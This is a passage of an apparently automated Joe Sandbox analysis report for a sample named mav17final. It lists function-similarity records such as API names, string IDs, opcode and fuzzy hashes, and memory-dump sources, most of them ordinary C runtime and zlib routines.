                                                  • Instruction Fuzzy Hash: CC313E72608A818AEB70AF70E8807FDA374FB84744F844439DA4E47AA5EF3CD548C724
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: 494f7018f429e3a3156a3848e8a2f878a80914e655882d93d256a720425552d1
                                                  • Instruction ID: 1f6f711290f21647482cf92cc7940c4b9b18ba1ff2f9c683f258319ad608774c
                                                  • Opcode Fuzzy Hash: 494f7018f429e3a3156a3848e8a2f878a80914e655882d93d256a720425552d1
                                                  • Instruction Fuzzy Hash: EAA1B662B2869181EA70EB36A440ABFE3A0FB54BD4F904536DE5D47BA4DF3CE4458730
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 1e147023b13237ffbc65418b8e432fc2e6dd89f910f01b87466ecf342e2d3767
                                                  • Instruction ID: 7af4d0f0aa0d8bd5ecf8d8b4279c0712f07bf755d75f1ad739eedfcd076b511a
                                                  • Opcode Fuzzy Hash: 1e147023b13237ffbc65418b8e432fc2e6dd89f910f01b87466ecf342e2d3767
                                                  • Instruction Fuzzy Hash: 24313032618F818ADB609F35E8806BEB3A4FB89754F940136EA8D43B65DF3CD555CB20
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite$ConsoleOutput
                                                  • String ID:
                                                  • API String ID: 1443284424-0
                                                  • Opcode ID: a870f68cda9430bfe6b15ba74579c72570b89eb0d9ddc512b88bb86eb6a5cd4d
                                                  • Instruction ID: ab7e605a46f303154699c840d1f19649605a342c667e96d550516c3f07169bb4
                                                  • Opcode Fuzzy Hash: a870f68cda9430bfe6b15ba74579c72570b89eb0d9ddc512b88bb86eb6a5cd4d
                                                  • Instruction Fuzzy Hash: 7DE1FF72A08B819AE721DB74D0805BDB7B1FB45798F914132EE4E57BA9DE38D806C720
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _get_daylight$_invalid_parameter_noinfo
                                                  • String ID: ?
                                                  • API String ID: 1286766494-1684325040
                                                  • Opcode ID: d4e410a16d487476c67d218b29ca1888644fd8d47f73a6752703e38714d72d13
                                                  • Instruction ID: 14fa8d8956e30b03cf1d1a156c9c7054106815ce597017553acc2c02147e2be6
                                                  • Opcode Fuzzy Hash: d4e410a16d487476c67d218b29ca1888644fd8d47f73a6752703e38714d72d13
                                                  • Instruction Fuzzy Hash: 96910766F0865285EB30BB35C480A7EAA61EBA1FD4F944135EA4D077E5DF3CD4828770
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $header crc mismatch$unknown compression method$unknown header flags set
                                                  • API String ID: 0-4074041902
                                                  • Opcode ID: be1d48212573e8220cad0fbc78fc00788ac171ee6cf0b3e8ac930acaa513398d
                                                  • Instruction ID: a1a7fc30e0b148b3ebf4be6f36f6e7a7e183d06bddaea3ba6a1e477d3fce3aae
                                                  • Opcode Fuzzy Hash: be1d48212573e8220cad0fbc78fc00788ac171ee6cf0b3e8ac930acaa513398d
                                                  • Instruction Fuzzy Hash: 57F1947260878A46E7B5AF2AD0C8E3ABBE9FF44744F454538DA4D077A4EB38D940C760
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: memcpy_s
                                                  • String ID:
                                                  • API String ID: 1502251526-0
                                                  • Opcode ID: 61c8d48a73c74d7b2b5693099c23eccbf95a4682f3061de545b2f75f73c9d44c
                                                  • Instruction ID: 4b056ea595aeca5703dc7c13519091f71c1dcab73378629ba451f276c68a09d6
                                                  • Opcode Fuzzy Hash: 61c8d48a73c74d7b2b5693099c23eccbf95a4682f3061de545b2f75f73c9d44c
                                                  • Instruction Fuzzy Hash: 81C1C176B1868687DB34DF29A184A7EB792F794784F948139DB4A83754DF3CE800CB60
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: incorrect header check$invalid window size$unknown compression method
                                                  • API String ID: 0-1186847913
                                                  • Opcode ID: e5489ffdc9239a6bbb5b0a781e308ccd149b9401a2c220e20fc3d81844b516e9
                                                  • Instruction ID: d9091dbdf6a198385143406ee099c9b06cfa625b3cbc412f8d042c3585cd63a3
                                                  • Opcode Fuzzy Hash: e5489ffdc9239a6bbb5b0a781e308ccd149b9401a2c220e20fc3d81844b516e9
                                                  • Instruction Fuzzy Hash: 5691D872A182864BE7B5AF25D4C8E3E76EDFB44344F514139DA4A467A0FB38E941CB20
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $ $invalid block type
                                                  • API String ID: 0-2056396358
                                                  • Opcode ID: 296c666076ee56b4f777f48a39b6fce6e00ed4a59ca727a8199edae2b727a8e6
                                                  • Instruction ID: 9724823d64b8aee7e4c854f436030f07f28a5d0f15d70a5f64877d458e74da74
                                                  • Opcode Fuzzy Hash: 296c666076ee56b4f777f48a39b6fce6e00ed4a59ca727a8199edae2b727a8e6
                                                  • Instruction Fuzzy Hash: 5261B7B390879A4AE7B1AF29D8CCA3A7AACFB40354F514135D658827E0FB39D545CB20
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: gfffffff
                                                  • API String ID: 3215553584-1523873471
                                                  • Opcode ID: 356f030ed7b35362b5f501750a10a67b28f658ed90bf6c8e393e6e46cd14dcf3
                                                  • Instruction ID: 15679eb6f9f65c01b33cc69a920f3b62bce4b1eeae50af348b43e3ac95419f1e
                                                  • Opcode Fuzzy Hash: 356f030ed7b35362b5f501750a10a67b28f658ed90bf6c8e393e6e46cd14dcf3
                                                  • Instruction Fuzzy Hash: 0E915963B083C64AEB25DB369480BBDAB91EB54B80F458132CE5D4B7A1DE3DE502C731
                                                  APIs
                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF79EA5A38E
                                                    • Part of subcall function 00007FF79EA567E8: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF79EA567C5), ref: 00007FF79EA567F1
                                                    • Part of subcall function 00007FF79EA567E8: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF79EA567C5), ref: 00007FF79EA56816
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                                  • String ID: -
                                                  • API String ID: 4036615347-2547889144
                                                  • Opcode ID: b729e8a8977ceecfd89cae93a3c6693c94b4856ac56d175175c079b617730af7
                                                  • Instruction ID: 5726c52c79ac9d72589c194e66bb117af71d9ce3586e37e65e0d2bcc77c8012c
                                                  • Opcode Fuzzy Hash: b729e8a8977ceecfd89cae93a3c6693c94b4856ac56d175175c079b617730af7
                                                  • Instruction Fuzzy Hash: BC91F462B0878586EB70AB359484B7DF6A1FB55BD4F844235EA9D03BA9CF3CE4008720
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise_clrfp
                                                  • String ID:
                                                  • API String ID: 15204871-0
                                                  • Opcode ID: ee517001d8d727e3896e11593ea3394e885c1995f059104ed8e3c6087952abb0
                                                  • Instruction ID: c673372fb3d5671630e15dfd0428f0a594f2b96a95027b9ac0f98356366583f1
                                                  • Opcode Fuzzy Hash: ee517001d8d727e3896e11593ea3394e885c1995f059104ed8e3c6087952abb0
                                                  • Instruction Fuzzy Hash: E7B17A73A00B848BEB29DF39C88A66C77A0F785F48F548921DA6D877B4CB39D451C720
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _get_daylight_invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 474895018-0
                                                  • Opcode ID: 3044ee37cc60d3eaf114ce5aaa27a3a7d66fe6401853c1350ed690cc36e8da8f
                                                  • Instruction ID: 03fd423d6db8c2af5409629a7c707a85e79328d6286557e16f4ba79b6c22a875
                                                  • Opcode Fuzzy Hash: 3044ee37cc60d3eaf114ce5aaa27a3a7d66fe6401853c1350ed690cc36e8da8f
                                                  • Instruction Fuzzy Hash: 0C71E332F0CA4246FB746B3884C0E7DE291EB5AB60F950635DB5D866F1DE7DE8818630
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: 0
                                                  • API String ID: 3215553584-4108050209
                                                  • Opcode ID: 392d87230a2f82bcc593fcf95495bab5ad40d3b97372ce6e23882fac41bb142b
                                                  • Instruction ID: f4bd3d4d8873b42c47f349b7b572bf0a42b4a215669f0dec4271fca389b59afa
                                                  • Opcode Fuzzy Hash: 392d87230a2f82bcc593fcf95495bab5ad40d3b97372ce6e23882fac41bb142b
                                                  • Instruction Fuzzy Hash: 1971A22AA2824282E678BB3950D0DBDA2D1FF42744FC47032DD49476B9EF2DE8438735
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: TMP
                                                  • API String ID: 3215553584-3125297090
                                                  • Opcode ID: 68220cee06eb1e49efdf68a7441363e76f193eaf92f3418bfe4dc13cbeb80bd7
                                                  • Instruction ID: 158831340b116bcd7a9e427636df67df4769bc02f768af6465cde99cbd4531a2
                                                  • Opcode Fuzzy Hash: 68220cee06eb1e49efdf68a7441363e76f193eaf92f3418bfe4dc13cbeb80bd7
                                                  • Instruction Fuzzy Hash: 1D618115B1C65241FA78BB366981A7ED2A2EF84BD4FC84035DE0E477B6DE3CE4468230
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: 0
                                                  • API String ID: 3215553584-4108050209
                                                  • Opcode ID: 537ccdf0245c343026de8cdba38534bbf0df83feeead17a75e0001d00461fa3c
                                                  • Instruction ID: f2f324eba78cfd75f355c1c318e01d34f2068b2e7432ec59d8920c79ba61f22e
                                                  • Opcode Fuzzy Hash: 537ccdf0245c343026de8cdba38534bbf0df83feeead17a75e0001d00461fa3c
                                                  • Instruction Fuzzy Hash: 1161D019A0C24646FAB86B395080FBA9B91FF41748FD43131DD88172F9EE2DE8428775
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: HeapProcess
                                                  • String ID:
                                                  • API String ID: 54951025-0
                                                  • Opcode ID: 0f61f16ebaa8a638a8a5e8d26b1d50f56c630599b3bc81483cd24e756a2acb9f
                                                  • Instruction ID: 6d291ef24f3072da2865daa0b2d7eafd307d8ff410d6eb3a9d535cb8d2c752c2
                                                  • Opcode Fuzzy Hash: 0f61f16ebaa8a638a8a5e8d26b1d50f56c630599b3bc81483cd24e756a2acb9f
                                                  • Instruction Fuzzy Hash: 42B09220E07A82C6EA187B216CC662462A4BF88B01FD44038C10C42330DE2C20B54770
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: de6771c1ef7e18c63946eeffa30aa9c1aaeeae17eb273b3e56296a943eb9139a
                                                  • Instruction ID: b809e26c95ad4355565e9af1f52dc3f7e75678f685883f636736f126d40dd63e
                                                  • Opcode Fuzzy Hash: de6771c1ef7e18c63946eeffa30aa9c1aaeeae17eb273b3e56296a943eb9139a
                                                  • Instruction Fuzzy Hash: 50C1F3332141E08BD699EB29E4994BA73E2F7C830DBC5802AEB87577C5CA7DE014D760
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d6ef73793ea1788ae08d57b95515db7d43b127d7364744ae73512ded182e4f5a
                                                  • Instruction ID: 52cdbf32910b75184ec613044198aa8b5e4500182a87d93ef2e935cb2e9d6a36
                                                  • Opcode Fuzzy Hash: d6ef73793ea1788ae08d57b95515db7d43b127d7364744ae73512ded182e4f5a
                                                  • Instruction Fuzzy Hash: 8F41A752C0DE4A44E9B56B380544EBC96C1DF73BA4FE852B5DD9A133E3DE0C258AC230
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: LanguagesPreferredRestoreThread
                                                  • String ID:
                                                  • API String ID: 1765668137-0
                                                  • Opcode ID: f40c359668217bfda64651ce9563db73d1d2d17d2c05805d259380fe19d81844
                                                  • Instruction ID: 31d50da03a0a21be74f48c2f61dd9141ff57588e212d8b62d8d2817114f61466
                                                  • Opcode Fuzzy Hash: f40c359668217bfda64651ce9563db73d1d2d17d2c05805d259380fe19d81844
                                                  • Instruction Fuzzy Hash: 3041E522B14A5482EF64DF3AD9549BDB3A1E748FD4B499032DE0D87B64DF3CC1468320
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
